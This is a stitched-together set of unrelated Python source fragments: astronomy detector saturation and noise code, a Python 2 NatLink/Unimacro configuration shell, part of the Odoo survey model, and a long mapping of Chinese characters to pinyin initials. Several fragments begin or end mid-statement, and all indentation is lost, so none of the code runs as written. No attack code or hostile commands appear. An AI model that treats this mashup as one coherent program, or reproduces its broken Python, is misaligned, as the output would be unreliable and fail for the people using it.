wdel = wsat_arr[1] - wsat_arr[0]
msat_arr = []
for w in wsat_arr:
l1 = w-wdel/4
l2 = w+wdel/4
ind = ((wspec > l1) & (wspec <= l2))
msat = sat_mag[fov_pix//2-1:fov_pix//2+2,ind].max()
sp_temp = sp.renorm(msat, 'vegamag', bp_lim)
obs_temp = S.Observation(sp_temp, bp_lim, binset=bp_lim.wave)
msat_arr.append(obs_temp.effstim(units))
msat_arr = np.array(msat_arr)
# Print verbose information
if not quiet:
if bp_lim.name == bp.name:
print('{0} Saturation Limit assuming {1} source:'.\
format(bp_lim.name,sp.name))
else:
print('{0} Saturation Limit for {1} assuming {2} source:'.\
format(bp_lim.name,bp.name,sp.name))
names = ('Wave','Sat Limit ({})'.format(units))
tbl = Table([wsat_arr,msat_arr], names=names)
for k in tbl.keys():
tbl[k].format = '9.2f'
print(tbl)
# Return saturation list along with corresponding wavelengths to dictionary
return {'wave':wsat_arr.tolist(), 'satmag':msat_arr.tolist(),
'units':units, 'Spectrum':sp_norm.name, 'bp_lim':bp_lim.name}
# DHS spectroscopy
elif (pupil is not None) and ('DHS' in pupil):
raise NotImplementedError
# Imaging
else:
psf = result
# Time to saturation for 10-mag source
# Only need the maximum pixel value
sat_time = sat_level / psf.max()
_log.debug('Point source approximate Time to {1:.2f} of Saturation: {0:.2f} sec'.\
format(sat_time,well_frac))
# Magnitude necessary to saturate a given pixel
ratio = int_time/sat_time
sat_mag = mag_norm + 2.5*np.log10(ratio)
# Convert to desired unit
sp_temp = sp.renorm(sat_mag, 'vegamag', bp_lim)
obs_temp = S.Observation(sp_temp, bp_lim, binset=bp_lim.wave)
res1 = obs_temp.effstim(units)
out1 = {'satlim':res1, 'units':units, 'bp_lim':bp_lim.name, 'Spectrum':sp_norm.name}
# For surface brightness saturation (extended object)
# Assume the fiducial (sp_norm) to be in terms of mag/arcsec^2
# Multiply countrate() by pix_scale^2 to get in terms of per pixel (area)
# This is the count rate per pixel for the fiducial starting point
image_ext = obs.countrate() * pix_scale**2 # e-/sec/pixel
sat_time = sat_level / image_ext
_log.debug('Extended object approximate Time to {1:.2f} of Saturation: {0:.2f} sec'.\
format(sat_time,well_frac))
# Magnitude necessary to saturate a given pixel
ratio = int_time / sat_time
sat_mag_ext = mag_norm + 2.5*np.log10(ratio)
# Convert to desired unit
sp_temp = sp.renorm(sat_mag_ext, 'vegamag', bp_lim)
obs_temp = S.Observation(sp_temp, bp_lim, binset=bp_lim.wave)
res2 = obs_temp.effstim(units)
out2 = out1.copy()
out2['satlim'] = res2
out2['units'] = units+'/arcsec^2'
# Print verbose information
if not quiet:
if bp_lim.name == bp.name:
print('{} Saturation Limit assuming {} source (point source): {:.2f} {}'.\
format(bp_lim.name, sp_norm.name, out1['satlim'], out1['units']) )
print('{} Saturation Limit assuming {} source (extended): {:.2f} {}'.\
format(bp_lim.name, sp_norm.name, out2['satlim'], out2['units']) )
else:
print('{} Saturation Limit for {} assuming {} source (point source): {:.2f} {}'.\
format(bp_lim.name, bp.name, sp_norm.name, out1['satlim'], out1['units']) )
print('{} Saturation Limit for {} assuming {} source (extended): {:.2f} {}'.\
format(bp_lim.name, bp.name, sp_norm.name, out2['satlim'], out2['units']) )
return out1, out2
def var_ex_model(ng, nf, params):
return 12. * (ng - 1.)/(ng + 1.) * params[0]**2 - params[1] / nf**0.5
def pix_noise(ngroup=2, nf=1, nd2=0, tf=10.73677, rn=15.0, ktc=29.0, p_excess=(0,0),
fsrc=0.0, idark=0.003, fzodi=0, fbg=0, ideal_Poisson=False,
ff_noise=False, **kwargs):
"""Noise per pixel
Theoretical noise calculation of a generalized MULTIACCUM ramp in terms of e-/sec.
Includes flat field errors from JWST-CALC-003894.
Parameters
----------
n : int
Number of groups in integration rampl
m : int
Number of frames in each groupl
s : int
Number of dropped frames in each groupl
tf : float
Frame time
rn : float
Read Noise per pixel (e-).
ktc : float
kTC noise (in e-). Only valid for single frame (n=1)l
p_excess : array-like
An array or list of two elements that holds the parameters
describing the excess variance observed in effective noise plots.
By default these are both 0. For NIRCam detectors, recommended
values are [1.0,5.0] for SW and [1.5,10.0] for LW.
fsrc : float
Flux of source in e-/sec/pix.
idark : float
Dark current in e-/sec/pix.
fzodi : float
Zodiacal light emission in e-/sec/pix.
fbg : float
Any additional background (telescope emission or scattered light?)
ideal_Poisson : bool
If set to True, use total signal for noise estimate,
otherwise MULTIACCUM equation is used.
ff_noise : bool
Include flat field errors in calculation? From JWST-CALC-003894.
Default=False.
Notes
-----
Various parameters can either be single values or numpy arrays.
If multiple inputs are arrays, make sure their array sizes match.
Variables that need to have the same array shapes (or a single value):
- n, m, s, & tf
- rn, idark, ktc, fsrc, fzodi, & fbg
Array broadcasting also works.
Example
-------
>>> n = np.arange(50)+1 # An array of different ngroups to test out
>>> # Create 2D Gaussian PSF with FWHM = 3 pix
>>> npix = 20 # Number of pixels in x and y direction
>>> fwhm = 3.0
>>> x = np.arange(0, npix, 1, dtype=float)
>>> y = x[:,np.newaxis]
>>> x0 = y0 = npix // 2 # Center position
>>> fsrc = np.exp(-4*np.log(2.) * ((x-x0)**2 + (y-y0)**2) / fwhm**2)
>>> fsrc /= fsrc.max()
>>> fsrc *= 10 # 10 counts/sec in peak pixel
>>> fsrc = fsrc.reshape(npix,npix,1) # Necessary for broadcasting
>>> # Represents pixel array w/ slightly different RN/pix
>>> rn = 15 + np.random.normal(loc=0, scale=0.5, size=(1,npix,npix))
>>> # Results is a 50x(20x20) showing the noise in e-/sec/pix at each group
>>> noise = pix_noise(ngroup=n, rn=rn, fsrc=fsrc)
"""
# Convert everything to arrays
n = np.array(ngroup)
m = np.array(nf)
s = np.array(nd2)
tf = np.array(tf)
# Total flux (e-/sec/pix)
ftot = fsrc + idark + fzodi + fbg
# Special case if n=1
# To be inserted at the end
if (n==1).any():
# Variance after averaging m frames
var = ktc**2 + (rn**2 + ftot*tf) / m
noise = np.sqrt(var)
noise /= tf # In terms of e-/sec
if (n==1).all(): return noise
noise_n1 = noise
ind_n1 = (n==1)
temp = np.array(rn+ktc+ftot)
temp_bool = np.zeros(temp.shape, dtype=bool)
ind_n1_all = (temp_bool | ind_n1)
# Group time
tg = tf * (m + s)
# Effective integration time
tint = tg * (n - 1)
# Read noise, group time, and frame time variances
# This is the MULTIACCUM eq from Rauscher et al. (2007).
# This equation assumes that the slope-fitting routine uses
# incorrect covariance matrix that doesn't take into account
# the correlated Poisson noise up the ramp.
var_rn = rn**2 * 12. * (n - 1.) / (m * n * (n + 1.))
var_gp = ftot * tint * 6. * (n**2. + 1.) / (5 * n * (n + 1.))
var_fm = ftot * tf * 2. * (m**2. - 1.) * (n - 1.) / (m * n * (n + 1.))
# Functional form for excess variance above theoretical
# Empirically measured formulation
# var_ex = | |
help_n
# Unimacro User directory and Editor or Unimacro INI files-----------------------------------
def do_o(self, arg):
arg = self.stripCheckDirectory(arg) # also quotes
if not arg:
return
self.config.setUnimacroUserDir(arg)
def do_O(self, arg):
self.message = "Clearing Unimacro user directory, and disable Unimacro"
print 'do action: %s'% self.message
self.config.clearUnimacroUserDir()
def help_o(self):
print '-'*60
userDir = self.config.getUserDirectory()
print \
"""set/clear UnimacroUserDirectory (o <path>/O)
And enable/disable Unimacro.
In this directory, your user INI files (and possibly other user
dependent files) will be put.
You can use (if entered through the CLI) "~" (or %%HOME%%) for user home directory, or
another environment variable (%%...%%). (example: "o ~\NatLink\Unimacro")
Setting this directory also enables Unimacro. Clearing it disables Unimacro
"""
print '='*60
help_O = help_o
# Unimacro Command Files Editor-----------------------------------------------
def do_p(self, arg):
if os.path.isfile(arg) and arg.endswith(".exe"):
self.message = "Setting (path to) Unimacro INI Files editor to %s"% arg
print 'do action: %s'% self.message
self.config.setUnimacroIniFilesEditor(arg)
else:
print 'Please specify a valid path for the Unimacro INI files editor, not |%s|'% arg
def do_P(self, arg):
self.message = "Clear Unimacro INI file editor, go back to default Notepad"
print 'do action: %s'% self.message
self.config.clearUnimacroIniFilesEditor()
def help_p(self):
print '-'*60
print \
"""set/clear path to Unimacro INI files editor (p <path>/P)
By default (when you clear this setting) "notepad" is used, but:
You can specify a program you like, for example,
TextPad, NotePad++, UltraEdit, or win32pad
You can even specify Wordpad, maybe Microsoft Word...
"""
print '='*60
help_P = help_p
# Unimacro Vocola features-----------------------------------------------
# managing the include file wrapper business.
# can be called from the Vocola compatibility button in the config GUI.
def do_l(self, arg):
self.message = "Copy include file Unimacro.vch into Vocola User Directory"
print 'do action: %s'% self.message
self.config.copyUnimacroIncludeFile()
def help_l(self):
print '-'*60
print \
"""Copy Unimacro.vch header file into Vocola User Files directory (l)
Insert/remove 'include Unimacro.vch' lines into/from each Vocola
command file (m/M)
Using Unimacro.vch, you can call Unimacro shorthand commands from a
Vocola command.
"""
print '='*60
def do_m(self, arg):
self.message = 'Insert "include Unimacro.vch" line in each Vocola Command File'
print 'do action: %s'% self.message
self.config.includeUnimacroVchLineInVocolaFiles()
def do_M(self, arg):
self.message = 'Remove "include Unimacro.vch" line from each Vocola Command File'
print 'do action: %s'% self.message
self.config.removeUnimacroVchLineInVocolaFiles()
help_m = help_M = help_l
# enable/disable NatLink------------------------------------------------
def do_e(self, arg):
self.message = "Enabling NatLink:"
print 'do action: %s'% self.message
self.config.enableNatlink()
def do_E(self, arg):
self.message = "Disabling NatLink:"
self.config.disableNatlink()
def help_e(self):
print '-'*60
print \
"""Enable NatLink (e) or disable NatLink (E):
When you enable NatLink, the necessary settings in nssystem.ini and nsapps.ini
are done.
These options require elevated mode and probably Dragon be closed.
After you restart %s, NatLink should start, opening a window titled
'Messages from NatLink - ...'.
When you enable NatLink, the file natlink.pyd is (re)registered silently. Use
the commands r/R to register/unregister natlink.pyd explicitly.
(see help r, but most often not needed)
When you disable NatLink, the necessary settings in nssystem.ini and nsapps.ini
are cleared.
After you restart %s, NatLink should NOT START ANY MORE
so the window 'Messages from NatLink' is NOT OPENED.
Note: when you disable NatLink, the natlink.pyd file is NOT unregistered.
It is not called any more by %s, as its declaration is removed from
the Global Clients section of nssystem.ini.
"""% (self.DNSName, self.DNSName, self.DNSName)
print "="*60
help_E = help_e
# Vocola and Vocola User directory------------------------------------------------
def do_v(self, arg):
if not arg:
self.message = "do_v should have an argument"
return
tryPath = self.config.isValidPath(arg)
if not tryPath:
self.message = "do_v, not a valid path: %s"% arg
return
self.message = 'Set VocolaUserDirectory to "%s" and enable Vocola'% arg
print 'do action: %s'% self.message
self.config.setVocolaUserDir(arg)
def do_V(self, arg):
self.message = "Clear VocolaUserDirectory and (therefore) disable Vocola"
print 'do action: %s'% self.message
self.config.clearVocolaUserDir()
def help_v(self):
print '-'*60
print \
"""Enable/disable Vocola by setting/clearing the VocolaUserDirectory
(v <path>/V).
In this VocolaUserDirectory your Vocola Command File are/will be located.
<path> must be an existing folder; NatLink\Vocola in My Documents is a
popular choice.
You may have to manually create this folder first.
"""
print '='*60
help_V = help_v
# Vocola Command Files Editor-----------------------------------------------
## def do_w(self, arg):
## if os.path.isfile(arg) and arg.endswith(".exe"):
## print "Setting Setting Vocola Command Files editor to %s"% arg
## self.config.setVocolaCommandFilesEditor(arg)
## else:
## print 'Please specify a valid path for Vocola command files editor: |%s|'% arg
##
## def do_W(self, arg):
## print "Clear Vocola commands file editor, go back to default notepad"
## self.config.clearVocolaCommandFilesEditor()
##
## def help_w(self):
## print '-'*60
## print \
##"""set/clear Vocola command files editor (w path/W)
##
##By default the editor "notepad" is used.
##
##You can specify a program you like, for example,
##TextPad, NotePad++, UltraEdit, or win32pad.
##
##"""
##
## print '='*60
##
## help_W = help_w
## testing:
def do_s(self, arg):
pydPath = r"C:\natlink\natlink\macrosystem\core\natlink.pyd"
print 'registered?: %s'% self.config.PydIsRegistered(pydPath)
pass
def do_g(self, arg):
print 'no valid option'
pass
def do_G(self, arg):
print 'no valid option'
def help_g(self):
print '-'*60
print \
"""not a valid option
"""
print '='*60
help_G = help_g
# enable/disable NatLink debug output...
def do_x(self, arg):
self.message = 'Enable natlinkmain giving debugLoad output to "Messages from Natlink" window'
print 'do action: %s'% self.message
self.config.enableDebugLoadOutput()
def do_X(self, arg):
self.message = 'Disable natlinkmain giving debugLoad output to "Messages from Natlink" window'
print 'do action: %s'% self.message
self.config.disableDebugLoadOutput()
# enable/disable NatLink debug output...
def do_y(self, arg):
self.message = 'Enable natlinkmain giving debugCallback output to "Messages from Natlink" window'
print 'do action: %s'% self.message
self.config.enableDebugCallbackOutput()
def do_Y(self, arg):
self.message = 'Disable natlinkmain giving debugCallback output to messages of "Messages from Natlink" window'
print 'do action: %s'% self.message
self.config.disableDebugCallbackOutput()
def help_x(self):
print '-'*60
print \
"""Enable (x)/disable (X) natlinkmain debug load output
Enable (y)/disable (Y) natlinkmain debug callback output
Nearly obsolete options.
This sends sometimes lengthy debugging messages to the
"Messages from NatLink" window.
Mainly used when you suspect problems with the working
of NatLink, so keep off (X and Y) most of the time.
"""
print '='*60
help_y = help_x
help_X = help_x
help_Y = help_x
# register natlink.pyd
def do_r(self, arg):
self.message = "(Re) register and enable natlink.pyd"
if self.config.isElevated:
print 'do action: %s'% self.message
isRegistered = self.config.userregnl.get("NatlinkPydRegistered")
#if isRegistered:
# print "If you have problems re-registering natlink.pyd, please try the following:"
# print "Un-register natlink.pyd first, then"
# print "If you want to try a new natlink.pyd, first exit this program,"
# print "Remove %s\\natlink.pyd"% coreDir
# print "and restart (in elevated mode) this program."
# print "The correct python version of natlink.pyd will be copied to natlink.pyd"
# print "and it will be registered again."
# return
if not self.config.removeNatlinkPyd():
return
self.config.configCheckNatlinkPydFile()
self.config.enableNatlink()
else:
raise ElevationError(self.message)
#
#
#self.config.registerNatlinkPyd(silent=None)
def do_R(self, arg):
self.message = "Unregister natlink.pyd and disable NatLink"
# if self.isNatSpeakRunning(): raise NatSpeakRunningError("Probably needed before you can unregister natlink.pyd")
if self.config.isElevated:
self.config.disableNatlink(silent=1)
self.config.unregisterNatlinkPyd(silent=None)
else:
raise ElevationError(self.message)
def do_z(self, arg):
"""register silent and enable NatLink"""
# if self.isNatSpeakRunning(): raise NatSpeakRunningError("Probably needed before you can register natlink.pyd")
if not self.config.removeNatlinkPyd():
return
self.config.configCheckNatlinkPydFile()
self.config.enableNatlink()
def do_Z(self, arg):
"""(SILENT) Unregister natlink.pyd and disable NatLink"""
# if self.isNatSpeakRunning(): raise NatSpeakRunningError("Probably needed before you can unregister natlink.pyd")
self.config.disableNatlink(silent=1)
self.config.unregisterNatlinkPyd(silent=1)
def help_r(self):
print '-'*60
print \
"""Registers (r) / unregisters (R) natlink.pyd explicitly.
Registering is also done (silently) when you start this program or the
configuration GUI the first time, so this option should only be needed in rare cases.
But if you do (-r or -R) a message dialog shows up to inform you what happened.
When you unregister, NatLink is also disabled.
When you want to try a new version of natlink.pyd, take the following steps:
-close Dragon
-remove natlink.pyd (in the MacroSystem/core directory of NatLink)
-rerun this program or the configure program in elevated mode.
The correct version of natlink.pyd (corresponding with your python version 2.6, 2.7 (2.5 for pre Dragon 12)
will be copied to this name and registered. In the log panel of the configure GUI the steps will show the result.
-restart Dragon.
If you want to (silently) enable NatLink and register silently use -z,
To disable NatLink and unregister (silently) use Z
"""
print '='*60
help_R = help_r
help_z = help_r
help_Z = help_r
# different Vocola options
def do_b(self, arg):
self.message = "Enable Vocola different user directories for different languages"
print 'do action: | |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import json
import random
import uuid
import werkzeug
from odoo import api, exceptions, fields, models, _
from odoo.exceptions import AccessError
from odoo.osv import expression
from odoo.tools import is_html_empty
class Survey(models.Model):
""" Settings for a multi-page/multi-question survey. Each survey can have one or more attached pages
and each page can display one or more questions. """
_name = 'survey.survey'
_description = 'Survey'
_rec_name = 'title'
_inherit = ['mail.thread', 'mail.activity.mixin']
def _get_default_access_token(self):
return str(uuid.uuid4())
def _get_default_session_code(self):
""" Attempt to generate a session code for our survey.
The method will first try to generate 20 codes with 4 digits each and check if any are colliding.
If we have at least one non-colliding code, we use it.
If all 20 generated codes are colliding, we try with 20 codes of 5 digits,
then 6, ... up to 10 digits. """
for digits_count in range(4, 10):
range_lower_bound = 1 * (10 ** (digits_count - 1))
range_upper_bound = (range_lower_bound * 10) - 1
code_candidates = set([str(random.randint(range_lower_bound, range_upper_bound)) for i in range(20)])
colliding_codes = self.sudo().search_read(
[('session_code', 'in', list(code_candidates))],
['session_code']
)
code_candidates -= set([colliding_code['session_code'] for colliding_code in colliding_codes])
if code_candidates:
return list(code_candidates)[0]
return False # could not generate a code
# description
title = fields.Char('Survey Title', required=True, translate=True)
color = fields.Integer('Color Index', default=0)
description = fields.Html(
"Description", translate=True, sanitize=False, # TDE FIXME: find a way to authorize videos
help="The description will be displayed on the home page of the survey. You can use this to give the purpose and guidelines to your candidates before they start it.")
description_done = fields.Html(
"End Message", translate=True,
help="This message will be displayed when survey is completed")
background_image = fields.Binary("Background Image")
active = fields.Boolean("Active", default=True)
state = fields.Selection(selection=[
('draft', 'Draft'), ('open', 'In Progress'), ('closed', 'Closed')
], string="Survey Stage", default='draft', required=True,
group_expand='_read_group_states')
# questions
question_and_page_ids = fields.One2many('survey.question', 'survey_id', string='Sections and Questions', copy=True)
page_ids = fields.One2many('survey.question', string='Pages', compute="_compute_page_and_question_ids")
question_ids = fields.One2many('survey.question', string='Questions', compute="_compute_page_and_question_ids")
questions_layout = fields.Selection([
('one_page', 'One page with all the questions'),
('page_per_section', 'One page per section'),
('page_per_question', 'One page per question')],
string="Layout", required=True, default='one_page')
questions_selection = fields.Selection([
('all', 'All questions'),
('random', 'Randomized per section')],
string="Selection", required=True, default='all',
help="If randomized is selected, you can configure the number of random questions by section. This mode is ignored in live session.")
progression_mode = fields.Selection([
('percent', 'Percentage'),
('number', 'Number')], string='Progression Mode', default='percent',
help="If Number is selected, it will display the number of questions answered on the total number of question to answer.")
# attendees
user_input_ids = fields.One2many('survey.user_input', 'survey_id', string='User responses', readonly=True, groups='survey.group_survey_user')
# security / access
access_mode = fields.Selection([
('public', 'Anyone with the link'),
('token', 'Invited people only')], string='Access Mode',
default='public', required=True)
access_token = fields.Char('Access Token', default=lambda self: self._get_default_access_token(), copy=False)
users_login_required = fields.Boolean('Login Required', help="If checked, users have to login before answering even with a valid token.")
users_can_go_back = fields.Boolean('Users can go back', help="If checked, users can go back to previous pages.")
users_can_signup = fields.Boolean('Users can signup', compute='_compute_users_can_signup')
# statistics
answer_count = fields.Integer("Registered", compute="_compute_survey_statistic")
answer_done_count = fields.Integer("Attempts", compute="_compute_survey_statistic")
answer_score_avg = fields.Float("Avg Score %", compute="_compute_survey_statistic")
success_count = fields.Integer("Success", compute="_compute_survey_statistic")
success_ratio = fields.Integer("Success Ratio", compute="_compute_survey_statistic")
# scoring
scoring_type = fields.Selection([
('no_scoring', 'No scoring'),
('scoring_with_answers', 'Scoring with answers at the end'),
('scoring_without_answers', 'Scoring without answers at the end')],
string="Scoring", required=True, default='no_scoring')
scoring_success_min = fields.Float('Success %', default=80.0)
# attendees context: attempts and time limitation
is_attempts_limited = fields.Boolean('Limited number of attempts', help="Check this option if you want to limit the number of attempts per user",
compute="_compute_is_attempts_limited", store=True, readonly=False)
attempts_limit = fields.Integer('Number of attempts', default=1)
is_time_limited = fields.Boolean('The survey is limited in time')
time_limit = fields.Float("Time limit (minutes)", default=10)
# certification
certification = fields.Boolean('Is a Certification', compute='_compute_certification',
readonly=False, store=True)
certification_mail_template_id = fields.Many2one(
'mail.template', 'Email Template',
domain="[('model', '=', 'survey.user_input')]",
help="Automated email sent to the user when he succeeds the certification, containing his certification document.")
certification_report_layout = fields.Selection([
('modern_purple', 'Modern Purple'),
('modern_blue', 'Modern Blue'),
('modern_gold', 'Modern Gold'),
('classic_purple', 'Classic Purple'),
('classic_blue', 'Classic Blue'),
('classic_gold', 'Classic Gold')],
string='Certification template', default='modern_purple')
# Certification badge
# certification_badge_id_dummy is used to have two different behaviours in the form view :
# - If the certification badge is not set, show certification_badge_id and only display create option in the m2o
# - If the certification badge is set, show certification_badge_id_dummy in 'no create' mode.
# So it can be edited but not removed or replaced.
certification_give_badge = fields.Boolean('Give Badge', compute='_compute_certification_give_badge',
readonly=False, store=True)
certification_badge_id = fields.Many2one('gamification.badge', 'Certification Badge')
certification_badge_id_dummy = fields.Many2one(related='certification_badge_id', string='Certification Badge ')
# live sessions
session_state = fields.Selection([
('ready', 'Ready'),
('in_progress', 'In Progress'),
], string="Session State", copy=False)
session_code = fields.Char('Session Code', default=lambda self: self._get_default_session_code(), copy=False,
help="This code will be used by your attendees to reach your session. Feel free to customize it however you like!")
session_link = fields.Char('Session Link', compute='_compute_session_link')
# live sessions - current question fields
session_question_id = fields.Many2one('survey.question', string="Current Question", copy=False,
help="The current question of the survey session.")
session_start_time = fields.Datetime("Current Session Start Time", copy=False)
session_question_start_time = fields.Datetime("Current Question Start Time", copy=False,
help="The time at which the current question has started, used to handle the timer for attendees.")
session_answer_count = fields.Integer("Answers Count", compute='_compute_session_answer_count')
session_question_answer_count = fields.Integer("Question Answers Count", compute='_compute_session_question_answer_count')
# live sessions - settings
session_show_leaderboard = fields.Boolean("Show Session Leaderboard", compute='_compute_session_show_leaderboard',
help="Whether or not we want to show the attendees leaderboard for this survey.")
session_speed_rating = fields.Boolean("Reward quick answers", help="Attendees get more points if they answer quickly")
# conditional questions management
has_conditional_questions = fields.Boolean("Contains conditional questions", compute="_compute_has_conditional_questions")
_sql_constraints = [
('access_token_unique', 'unique(access_token)', 'Access token should be unique'),
('session_code_unique', 'unique(session_code)', 'Session code should be unique'),
('certification_check', "CHECK( scoring_type!='no_scoring' OR certification=False )",
'You can only create certifications for surveys that have a scoring mechanism.'),
('scoring_success_min_check', "CHECK( scoring_success_min IS NULL OR (scoring_success_min>=0 AND scoring_success_min<=100) )",
'The percentage of success has to be defined between 0 and 100.'),
('time_limit_check', "CHECK( (is_time_limited=False) OR (time_limit is not null AND time_limit > 0) )",
'The time limit needs to be a positive number if the survey is time limited.'),
('attempts_limit_check', "CHECK( (is_attempts_limited=False) OR (attempts_limit is not null AND attempts_limit > 0) )",
'The attempts limit needs to be a positive number if the survey has a limited number of attempts.'),
('badge_uniq', 'unique (certification_badge_id)', "The badge for each survey should be unique!"),
('give_badge_check', "CHECK(certification_give_badge=False OR (certification_give_badge=True AND certification_badge_id is not null))",
'Certification badge must be configured if Give Badge is set.'),
]
def _compute_users_can_signup(self):
signup_allowed = self.env['res.users'].sudo()._get_signup_invitation_scope() == 'b2c'
for survey in self:
survey.users_can_signup = signup_allowed
@api.depends('user_input_ids.state', 'user_input_ids.test_entry', 'user_input_ids.scoring_percentage', 'user_input_ids.scoring_success')
def _compute_survey_statistic(self):
default_vals = {
'answer_count': 0, 'answer_done_count': 0, 'success_count': 0,
'answer_score_avg': 0.0, 'success_ratio': 0.0
}
stat = dict((cid, dict(default_vals, answer_score_avg_total=0.0)) for cid in self.ids)
UserInput = self.env['survey.user_input']
base_domain = ['&', ('survey_id', 'in', self.ids), ('test_entry', '!=', True)]
read_group_res = UserInput.read_group(base_domain, ['survey_id', 'state'], ['survey_id', 'state', 'scoring_percentage', 'scoring_success'], lazy=False)
for item in read_group_res:
stat[item['survey_id'][0]]['answer_count'] += item['__count']
stat[item['survey_id'][0]]['answer_score_avg_total'] += item['scoring_percentage']
if item['state'] == 'done':
stat[item['survey_id'][0]]['answer_done_count'] += item['__count']
if item['scoring_success']:
stat[item['survey_id'][0]]['success_count'] += item['__count']
for survey_id, values in stat.items():
avg_total = stat[survey_id].pop('answer_score_avg_total')
stat[survey_id]['answer_score_avg'] = avg_total / (stat[survey_id]['answer_done_count'] or 1)
stat[survey_id]['success_ratio'] = (stat[survey_id]['success_count'] / (stat[survey_id]['answer_done_count'] or 1.0))*100
for survey in self:
survey.update(stat.get(survey._origin.id, default_vals))
@api.depends('question_and_page_ids')
def _compute_page_and_question_ids(self):
for survey in self:
survey.page_ids = survey.question_and_page_ids.filtered(lambda question: question.is_page)
survey.question_ids = survey.question_and_page_ids - survey.page_ids
@api.depends('question_and_page_ids.is_conditional', 'users_login_required', 'access_mode')
def _compute_is_attempts_limited(self):
for survey in self:
if not survey.is_attempts_limited or \
(survey.access_mode == 'public' and not survey.users_login_required) or \
any(question.is_conditional for question in survey.question_and_page_ids):
survey.is_attempts_limited = False
@api.depends('session_start_time', 'user_input_ids')
def _compute_session_answer_count(self):
""" We have to loop since our result is dependent of the survey.session_start_time.
This field is currently used to display the count about a single survey, in the
context of sessions, so it should not matter too much. """
for survey in self:
answer_count = 0
input_count = self.env['survey.user_input'].read_group(
[('survey_id', '=', survey.id),
('is_session_answer', '=', True),
('state', '!=', 'done'),
('create_date', '>=', survey.session_start_time)],
['create_uid:count'],
['survey_id'],
)
if input_count:
answer_count = input_count[0].get('create_uid', 0)
survey.session_answer_count = answer_count
@api.depends('session_question_id', 'session_start_time', 'user_input_ids.user_input_line_ids')
def _compute_session_question_answer_count(self):
""" We have to loop since our result is dependent of | |
[u'k'] ,
u'㢁' : [u'c'] ,
u'夀' : [u's'] ,
u'綃' : [u'x', u's'] ,
u'騂' : [u'x'] ,
u'䄐' : [u'q'] ,
u'斓' : [u'l'] ,
u'舒' : [u'y', u's'] ,
u'椠' : [u'q'] ,
u'亥' : [u'h'] ,
u'莧' : [u'x', u'w', u'h'] ,
u'刲' : [u'k'] ,
u'皵' : [u'q'] ,
u'霴' : [u'd'] ,
u'㥀' : [u'd'] ,
u'穂' : [u's'] ,
u'叇' : [u'd'] ,
u'铉' : [u'x'] ,
u'扒' : [u'p', u'b'] ,
u'篗' : [u'y'] ,
u'顖' : [u'x'] ,
u'佤' : [u'w'] ,
u'揧' : [u'l'] ,
u'聦' : [u'c'] ,
u'駫' : [u'j'] ,
u'睴' : [u'g'] ,
u'䳹' : [u'k'] ,
u'臻' : [u'z'] ,
u'傆' : [u'y'] ,
u'閈' : [u'h'] ,
u'樍' : [u'j'] ,
u'碖' : [u'l'] ,
u'土' : [u't'] ,
u'蠡' : [u'l'] ,
u'悦' : [u'y'] ,
u'㨭' : [u'h'] ,
u'缯' : [u'c', u'z'] ,
u'躺' : [u't'] ,
u'朿' : [u'c'] ,
u'鵃' : [u'z'] ,
u'痈' : [u'y'] ,
u'䁑' : [u'y'] ,
u'蕓' : [u'y'] ,
u'廚' : [u'c'] ,
u'鏜' : [u't'] ,
u'㝟' : [u'm', u'w'] ,
u'桡' : [u'r', u'n'] ,
u'䛪' : [u'q', u'w'] ,
u'啳' : [u'q', u'j'] ,
u'陵' : [u'l'] ,
u'滺' : [u'y', u'd'] ,
u'㶅' : [u'x'] ,
u'錆' : [u'q'] ,
u'沏' : [u'q'] ,
u'徙' : [u'x'] ,
u'瀜' : [u'y', u'r'] ,
u'躣' : [u'q'] ,
u'䞩' : [u'r', u'e'] ,
u'㲯' : [u'r'] ,
u'鈰' : [u's'] ,
u'䬶' : [u'e'] ,
u'澹' : [u's', u'd', u't'] ,
u'廃' : [u'f'] ,
u'獆' : [u'h'] ,
u'觍' : [u't'] ,
u'㿙' : [u'p'] ,
u'鵚' : [u't'] ,
u'滣' : [u'c'] ,
u'蕪' : [u'w'] ,
u'姭' : [u'x'] ,
u'牰' : [u'y', u'c'] ,
u'裷' : [u'y', u'g'] ,
u'䇽' : [u'z'] ,
u'笁' : [u'z'] ,
u'鲄' : [u'h'] ,
u'喊' : [u'h'] ,
u'挑' : [u't'] ,
u'蒔' : [u's'] ,
u'创' : [u'c'] ,
u'败' : [u'b'] ,
u'稫' : [u'b'] ,
u'斪' : [u'q'] ,
u'咴' : [u'h'] ,
u'戻' : [u'l'] ,
u'螾' : [u'y'] ,
u'嵅' : [u'g'] ,
u'糄' : [u'b'] ,
u'㗊' : [u'j'] ,
u'豏' : [u'x'] ,
u'䕕' : [u'm'] ,
u'擔' : [u'd'] ,
u'默' : [u'm'] ,
u'埞' : [u'd'] ,
u'浥' : [u'y'] ,
u'蛨' : [u'm'] ,
u'屯' : [u'z', u't'] ,
u'翮' : [u'h', u'l'] ,
u'㓴' : [u'r', u'j'] ,
u'轹' : [u'l'] ,
u'䑿' : [u's'] ,
u'柾' : [u'j'] ,
u'㚉' : [u'g'] ,
u'圈' : [u'q', u'j'] ,
u'残' : [u'c'] ,
u'鐊' : [u'y'] ,
u'㨖' : [u'z'] ,
u'缘' : [u'y'] ,
u'傝' : [u't'] ,
u'閟' : [u'b'] ,
u'木' : [u'm'] ,
u'㮫' : [u'h'] ,
u'碭' : [u'd'] ,
u'餬' : [u'h'] ,
u'䰺' : [u'j'] ,
u'悽' : [u'q'] ,
u'脼' : [u'l'] ,
u'髁' : [u'k'] ,
u'㝈' : [u'l'] ,
u'瑊' : [u'z', u'j'] ,
u'苑' : [u'y'] ,
u'兜' : [u'd'] ,
u'痟' : [u'x'] ,
u'陞' : [u's'] ,
u'祬' : [u'z'] ,
u'勱' : [u'm'] ,
u'音' : [u'y'] ,
u'慼' : [u'q'] ,
u'鮀' : [u't'] ,
u'簅' : [u'c'] ,
u'于' : [u'y', u'x'] ,
u'莐' : [u'c'] ,
u'搕' : [u'k'] ,
u'夗' : [u'y', u'w'] ,
u'鸙' : [u'y'] ,
u'皞' : [u'h'] ,
u'䄧' : [u'r'] ,
u'蘩' : [u'f'] ,
u'厰' : [u'c'] ,
u'邲' : [u'b'] ,
u'椷' : [u'h', u'j'] ,
u'節' : [u'j'] ,
u'噉' : [u'd'] ,
u'譋' : [u'l'] ,
u'提' : [u's', u't', u'd'] ,
u'繙' : [u'f'] ,
u'䣢' : [u'j'] ,
u'跤' : [u'q', u'j'] ,
u'晩' : [u'w'] ,
u'孫' : [u'x', u's'] ,
u'顭' : [u'h'] ,
